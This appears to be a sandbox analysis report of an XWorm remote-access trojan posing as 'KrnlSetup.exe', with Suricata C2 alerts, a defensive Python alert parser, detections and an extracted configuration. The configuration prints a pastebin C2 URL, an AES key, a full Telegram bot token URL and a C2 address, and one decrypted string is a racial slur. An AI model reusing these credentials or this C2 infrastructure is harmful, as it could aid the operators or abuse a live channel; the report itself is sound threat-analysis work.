2024-12-10T10:05:24.284666+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.399411+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.530557+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.659984+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.779401+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.898961+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.018450+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.137856+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.359880+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.479548+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.601845+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.721165+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.842004+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.929310+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.049097+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.169325+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.288740+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.527682+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.647074+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.758670+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.876964+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.011248+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.146818+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.269718+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.390329+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.596782+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.862581+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.982094+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.142483+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.261891+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.382436+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.624004+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.789710+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.911765+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.031215+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.152823+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.257744+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.273973+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.393724+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.513756+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.633791+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.753195+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.899277+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
Suricata alerts, SID 2852874
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T10:05:22.882125+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T10:05:20.388438+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.508839+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.629374+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.748806+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.868343+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.988429+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.109747+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.229755+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.349751+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.469250+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.588749+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.709750+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.829229+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:21.917850+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.148168+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.269031+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.388499+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.507997+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.617874+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.746512+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.865936+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.105359+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.208331+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.328595+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.448019+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.567924+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.687430+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.802604+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:23.922164+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.045611+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.165329+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.284666+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.399411+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.530557+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.659984+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.779401+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:24.898961+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.018450+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.137856+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.359880+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.479548+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.601845+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.721165+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.842004+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:25.929310+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.049097+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.169325+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.288740+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.527682+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.647074+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:26.876964+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.011248+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.146818+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.269718+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.390329+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.596782+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.862581+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:27.982094+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.142483+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.261891+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.382436+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.624004+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.789710+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:28.911765+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.031215+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.152823+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.257744+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.273973+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.393724+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.513756+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.633791+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.753195+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.899277+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T10:05:26.204070+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T10:05:19.909745+0100 | 2853191 | 1 | Malware Command and Control Activity Detected | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T10:05:19.229984+0100 | 2853192 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP
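The alert table above is what an analyst usually reduces to two facts: which TCP conversations carried which rules in which direction, and how regular the C2 beacon is. The following is an added example, not part of the Joe Sandbox report: it parses a subset of the report's own rows (re-keyed one alert per line with " | " between the columns), groups them into client/server conversations, and computes the median gap between consecutive alerts of one rule. The rule messages are the ones listed in the Networking section; treating an RFC 1918 source address as "the sandbox VM, so outbound" is an assumption that holds for this report's 192.168.2.x host.

```python
"""Summarise Suricata C2 alerts from a sandbox report into conversations and beacon cadence."""
from __future__ import annotations

import ipaddress
import statistics
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Rule messages exactly as listed under Networking in the report (SID -> msg).
SID_MSG = {
    2852870: "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes",
    2852873: "ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2",
    2852874: "ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2",
    2852923: "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)",
    2853191: "ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound",
    2853192: "ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound",
    2853685: "ETPRO MALWARE Win32/XWorm Checkin via Telegram",
    2855924: "ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound",
}

# Thirteen rows taken from the report's alert table, one alert per line, columns
# separated by " | ": timestamp, SID, severity, classtype, src IP, src port,
# dst IP, dst port, protocol.
SAMPLE_ALERTS = """\
2024-12-10T10:05:19.229984+0100 | 2853192 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:19.909745+0100 | 2853191 | 1 | Malware Command and Control Activity Detected | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP
2024-12-10T10:05:20.388438+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.508839+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:20.629374+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:22.882125+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP
2024-12-10T10:05:26.204070+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.273973+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.393724+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.513756+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.633791+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.753195+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
2024-12-10T10:05:29.899277+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP
"""


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    severity: int
    classtype: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str

    @property
    def outbound(self) -> bool:
        # Assumption: a private (RFC 1918) source is the sandbox VM, so the
        # alert fired on traffic leaving the analysis host.
        return ipaddress.ip_address(self.src).is_private


def parse_alerts(text: str) -> list[Alert]:
    """Parse ' | '-separated alert rows; blank lines are skipped."""
    alerts: list[Alert] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sev, cls, src, sport, dst, dport, proto = (c.strip() for c in line.split(" | "))
        alerts.append(Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                            int(sid), int(sev), cls, src, int(sport), dst, int(dport), proto))
    return alerts


def conversations(alerts: list[Alert]) -> dict[tuple[str, int, str, int], dict[str, set[int]]]:
    """Group alerts by TCP conversation, keyed (client_ip, client_port, server_ip, server_port),
    recording which SIDs fired outbound ("out") and inbound ("in")."""
    conv: dict = defaultdict(lambda: {"out": set(), "in": set()})
    for a in alerts:
        if a.outbound:
            conv[(a.src, a.sport, a.dst, a.dport)]["out"].add(a.sid)
        else:
            conv[(a.dst, a.dport, a.src, a.sport)]["in"].add(a.sid)
    return dict(conv)


def median_interval(alerts: list[Alert], sid: int) -> float | None:
    """Median seconds between consecutive alerts of one rule, or None if fewer than two fired."""
    stamps = sorted(a.ts for a in alerts if a.sid == sid)
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
    return statistics.median(gaps) if gaps else None


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)
    for (cip, cport, sip, sport), seen in conversations(alerts).items():
        print(f"{cip}:{cport} -> {sip}:{sport}")
        for direction in ("out", "in"):
            for sid in sorted(seen[direction]):
                print(f"  {direction:>3} {sid} {SID_MSG.get(sid, '?')}")
    print("median gap between PING alerts (s):", median_interval(alerts, 2852873))
```

The 2852873 (PING) rows in the full table arrive roughly every 0.12 s on port 49797, which is far faster than a human-driven session and a usable cadence feature if the same sample is hunted for in flow logs where the IDS signature is not available.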

                                    AV Detection

Source: KrnlSetup.exe | Avira: detected
Source: C:\ProgramData\ntoskrnl.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: KrnlSetup.exe | Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/5FinF5Mf"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "drivers.exe", "Version": "XWorm V5.2"}
Source: KrnlSetup.exe.7120.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage"}
Source: C:\ProgramData\ntoskrnl.exe | ReversingLabs: Detection: 73%
Source: KrnlSetup.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\ntoskrnl.exe | Joe Sandbox ML: detected
Source: KrnlSetup.exe | Joe Sandbox ML: detected
Source: KrnlSetup.exe | String decryptor: https://pastebin.com/raw/5FinF5Mf
Source: KrnlSetup.exe | String decryptor: <123456789>
Source: KrnlSetup.exe | String decryptor: <Xwormmm>
Source: KrnlSetup.exe | String decryptor: niggereezzzz
Source: KrnlSetup.exe | String decryptor: drivers.exe
Source: KrnlSetup.exe | String decryptor: %ProgramData%
Source: KrnlSetup.exe | String decryptor: ntoskrnl.exe
Source: KrnlSetup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\KrnlSetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KrnlSetup.exe.log
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: KrnlSetup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 4x nop then jmp 00007FFD9B793592h | 0_2_00007FFD9B7933FC
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 4x nop then jmp 00007FFD9B794634h | 0_2_00007FFD9B793FB9
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 4x nop then jmp 00007FFD9B794645h | 0_2_00007FFD9B793FB9
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 4x nop then jmp 00007FFD9B795277h | 0_2_00007FFD9B78EB60

                                    Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 115.69.183.222:37593 -> 192.168.2.4:49751
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49751 -> 115.69.183.222:37593
Source: Network traffic | Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.4:49797 -> 115.69.183.222:37593
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49797 -> 115.69.183.222:37593
Source: Network traffic | Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49751 -> 115.69.183.222:37593
Source: Network traffic | Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 115.69.183.222:37593 -> 192.168.2.4:49751
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 115.69.183.222:37593 -> 192.168.2.4:49751
Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49751 -> 115.69.183.222:37593
Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49745 -> 149.154.167.220:443
Source: Malware configuration extractor | URLs: https://pastebin.com/raw/5FinF5Mf
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: KrnlSetup.exe, type: SAMPLE
Source: Yara match | File source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.4:49751 -> 115.69.183.222:37593
Source: global traffic | HTTP traffic detected: GET /raw/5FinF5Mf HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
